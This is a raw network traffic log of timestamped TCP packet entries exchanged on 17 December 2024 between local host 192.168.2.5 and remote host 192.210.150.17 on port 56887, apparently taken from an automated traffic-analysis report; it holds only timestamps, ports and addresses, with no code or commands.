                                                  Dec 17, 2024 16:39:57.859159946 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.859201908 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.859213114 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.859263897 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.859308958 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.899544954 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.928466082 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.928601027 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.331145048 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:58.451457024 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.680005074 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.731981039 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:58.733876944 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:58.851788044 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851808071 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851820946 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851830006 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851865053 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851901054 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852050066 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852091074 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852128983 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852138996 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852219105 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852229118 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852255106 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852277040 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.853394032 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.853410006 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.853451014 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.853579044 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.971400023 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.971419096 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.971438885 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.971447945 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:59.346534014 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:59.466268063 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:59.542332888 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:59.542450905 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:59.547579050 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:59.547635078 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:59.547692060 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:59.667383909 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:00.362195015 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:00.481997967 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:00.518928051 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:00.658854961 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.201109886 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:01.202168941 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:01.203062057 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.203094006 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.322882891 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:01.326596022 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.329703093 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.449990034 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.445908070 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.502444983 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.679790974 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.685882092 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.733932972 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.805905104 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.805982113 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854001045 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854017973 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854063034 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854121923 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854124069 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854132891 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854171991 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854171991 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854197025 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854238987 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854311943 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854322910 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854331970 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.925595045 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974164009 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974180937 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974193096 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974236965 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974267006 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974343061 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974387884 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974466085 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974509001 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:06.199767113 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:06.199929953 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:06.199929953 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:06.319658041 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:08.311168909 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:08.314953089 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:08.435683966 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.426235914 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.427656889 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.471282005 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.547457933 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.547566891 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.551361084 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.641644001 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.647183895 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.671149015 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.690043926 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.767035007 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.767122984 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.773159981 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.896028996 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:11.668829918 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:11.721263885 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:11.886948109 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:11.907866955 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:11.913460016 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:11.940037012 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.033494949 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.035645008 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.122387886 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.128027916 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.155487061 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.172152996 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.248127937 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.249686956 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.291912079 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.291928053 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.291990995 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.292037010 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292049885 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292093039 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.292228937 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292242050 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292298079 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.292359114 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292383909 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292406082 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.369555950 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.411916971 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.411936045 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412049055 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412065029 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412163973 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412328005 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412343025 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412359953 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412543058 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.924701929 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:13.044692039 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.439743042 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.484307051 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:13.485522032 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:13.605035067 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605076075 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605099916 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605123043 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605145931 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605205059 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605226994 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605248928 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605271101 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605293036 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605314016 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605371952 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605393887 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605415106 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605587959 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.724783897 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.724842072 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.724874973 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.940259933 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:14.060461044 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.270682096 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.315035105 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:14.317311049 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:14.318536043 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:14.438215017 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438239098 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438330889 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438344955 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438360929 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438417912 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438519955 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438534021 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438549995 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.557816029 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.557867050 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.557976961 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558007956 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558034897 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558130980 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558161020 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558198929 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558226109 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558303118 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558370113 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558442116 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558492899 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.956016064 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:15.189198017 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.400918961 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.437552929 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:15.438851118 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:15.557591915 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557632923 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557646990 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557661057 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557812929 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557826042 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557857037 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557883978 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.558326960 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.558339119 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.649605036 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.649655104 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.650154114 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677086115 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677104950 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677117109 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677171946 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677185059 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677308083 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677320004 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677398920 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677675962 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.501727104 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.501775026 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.504678011 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.504755974 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.504801989 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.508023977 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.508183002 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.508224010 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.511226892 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.511351109 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.511403084 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.514511108 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.514652967 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.514695883 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.517791033 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.517853975 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.517904997 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.521059990 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.521152020 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.521194935 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.524310112 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.524368048 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.524415016 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.527345896 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527374983 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527510881 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527642012 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527723074 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527736902 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527776003 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.527818918 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527832031 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527843952 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527856112 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527955055 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527967930 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527978897 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.527990103 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528002024 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528119087 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528578043 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528590918 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528620958 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528677940 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528716087 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528764963 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528806925 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.528830051 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.530277967 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.530350924 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.530402899 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.532932997 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.533109903 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.533159018 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.535643101 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.535729885 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.535778046 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.538305044 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.538435936 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.538486958 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.541100025 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.541208029 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.541253090 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.548634052 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.548661947 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.548909903 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.549958944 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.550019979 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.551342964 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.552381039 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.552467108 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.554944992 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.555104017 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.555157900 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.555157900 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.557684898 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.557832956 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.557917118 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.560029984 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.560134888 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.560230970 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.562583923 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.562825918 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.563014030 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.565078974 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.565248966 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.565645933 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.567614079 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.567697048 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.570475101 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.570668936 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.570715904 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.570715904 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.572889090 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.573040009 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.573479891 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.576024055 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.576195955 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.576668024 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.578278065 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.578382015 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.578797102 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.580593109 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.580710888 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.581003904 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.582689047 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.582839966 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.583367109 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.584990978 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.585196018 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.587348938 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.587373018 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.587454081 CET5688749988192.210.150.17192.168.2.5
